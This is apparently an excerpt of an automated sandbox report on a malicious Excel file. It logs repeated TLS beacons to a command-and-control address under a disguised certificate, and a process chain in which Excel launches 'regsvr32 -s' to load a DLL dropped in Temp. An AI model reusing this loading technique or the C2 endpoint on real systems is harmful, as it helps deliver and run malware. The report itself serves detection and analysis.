                                                                                                                                      Jan 12, 2021 01:44:15.545794010 CET77.220.64.37443192.168.2.2249195CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:18.668025017 CET77.220.64.37443192.168.2.2249199CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:20.782258987 CET77.220.64.37443192.168.2.2249203CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:22.895056963 CET77.220.64.37443192.168.2.2249207CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:25.002497911 CET77.220.64.37443192.168.2.2249211CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:27.108376980 CET77.220.64.37443192.168.2.2249215CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:29.176541090 CET77.220.64.37443192.168.2.2249219CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:31.256057024 CET77.220.64.37443192.168.2.2249223CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:33.550777912 CET77.220.64.37443192.168.2.2249229CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:36.422943115 CET77.220.64.37443192.168.2.2249233CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:38.558763981 CET77.220.64.37443192.168.2.2249237CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:40.655749083 CET77.220.64.37443192.168.2.2249241CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:42.762681007 CET77.220.64.37443192.168.2.2249245CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:44.949043036 CET77.220.64.37443192.168.2.2249249CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:47.099344015 CET77.220.64.37443192.168.2.2249253CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:49.200659990 CET77.220.64.37443192.168.2.2249257CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:51.536020994 CET77.220.64.37443192.168.2.2249261CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:54.069024086 CET77.220.64.37443192.168.2.2249265CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:56.163307905 CET77.220.64.37443192.168.2.2249269CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:44:58.286957026 CET77.220.64.37443192.168.2.2249273CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:00.440151930 CET77.220.64.37443192.168.2.2249277CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:02.480573893 CET77.220.64.37443192.168.2.2249281CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:04.587567091 CET77.220.64.37443192.168.2.2249285CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:06.703485012 CET77.220.64.37443192.168.2.2249289CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:08.957114935 CET77.220.64.37443192.168.2.2249293CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:11.386787891 CET77.220.64.37443192.168.2.2249297CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:13.495340109 CET77.220.64.37443192.168.2.2249301CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:15.603847027 CET77.220.64.37443192.168.2.2249305CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:17.696660042 CET77.220.64.37443192.168.2.2249309CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:19.800482035 CET77.220.64.37443192.168.2.2249313CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:21.920305967 CET77.220.64.37443192.168.2.2249317CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:24.042557955 CET77.220.64.37443192.168.2.2249321CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:26.353760958 CET77.220.64.37443192.168.2.2249325CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:28.783770084 CET77.220.64.37443192.168.2.2249329CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:30.906864882 CET77.220.64.37443192.168.2.2249333CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:33.014612913 CET77.220.64.37443192.168.2.2249337CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:35.135796070 CET77.220.64.37443192.168.2.2249341CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:37.273354053 CET77.220.64.37443192.168.2.2249345CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:39.394809008 CET77.220.64.37443192.168.2.2249349CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:41.501972914 CET77.220.64.37443192.168.2.2249353CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:43.740381956 CET77.220.64.37443192.168.2.2249357CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:46.466078043 CET77.220.64.37443192.168.2.2249362CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:48.672018051 CET77.220.64.37443192.168.2.2249366CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:50.877825022 CET77.220.64.37443192.168.2.2249370CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:52.970568895 CET77.220.64.37443192.168.2.2249374CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:55.058487892 CET77.220.64.37443192.168.2.2249378CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:57.165930033 CET77.220.64.37443192.168.2.2249382CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:45:59.286123991 CET77.220.64.37443192.168.2.2249386CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:46:01.400849104 CET77.220.64.37443192.168.2.2249390CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:46:03.514745951 CET77.220.64.37443192.168.2.2249394CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                                                                      Jan 12, 2021 01:46:05.621118069 CET77.220.64.37443192.168.2.2249398CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWCN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RWSun Nov 22 23:47:21 CET 2020Mon May 24 00:47:21 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87

                                                                                                                                      Code Manipulations

                                                                                                                                      Statistics

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      Analysis Process: EXCEL.EXE PID: 2292 Parent PID: 584

                                                                                                                                      General

                                                                                                                                      Start time:01:43:38
                                                                                                                                      Start date:12/01/2021
                                                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                      Imagebase:0x13f1d0000
                                                                                                                                      File size:27641504 bytes
                                                                                                                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Analysis Process: regsvr32.exe PID: 2500 Parent PID: 2292

                                                                                                                                      General

                                                                                                                                      Start time:01:43:45
                                                                                                                                      Start date:12/01/2021
                                                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
                                                                                                                                      Imagebase:0xffcb0000
                                                                                                                                      File size:19456 bytes
                                                                                                                                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Analysis Process: regsvr32.exe PID: 2504 Parent PID: 2500

                                                                                                                                      General

                                                                                                                                      Start time:01:43:46
                                                                                                                                      Start date:12/01/2021
                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline: -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
                                                                                                                                      Imagebase:0xc80000
                                                                                                                                      File size:14848 bytes
                                                                                                                                      MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      Analysis Process: DW20.EXE PID: 2448 Parent PID: 2292

                                                                                                                                      General

                                                                                                                                      Start time:01:44:04
                                                                                                                                      Start date:12/01/2021
                                                                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1840
                                                                                                                                      Imagebase:0x13fa10000
                                                                                                                                      File size:995024 bytes
                                                                                                                                      MD5 hash:45A078B2967E0797360A2D4434C41DB4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

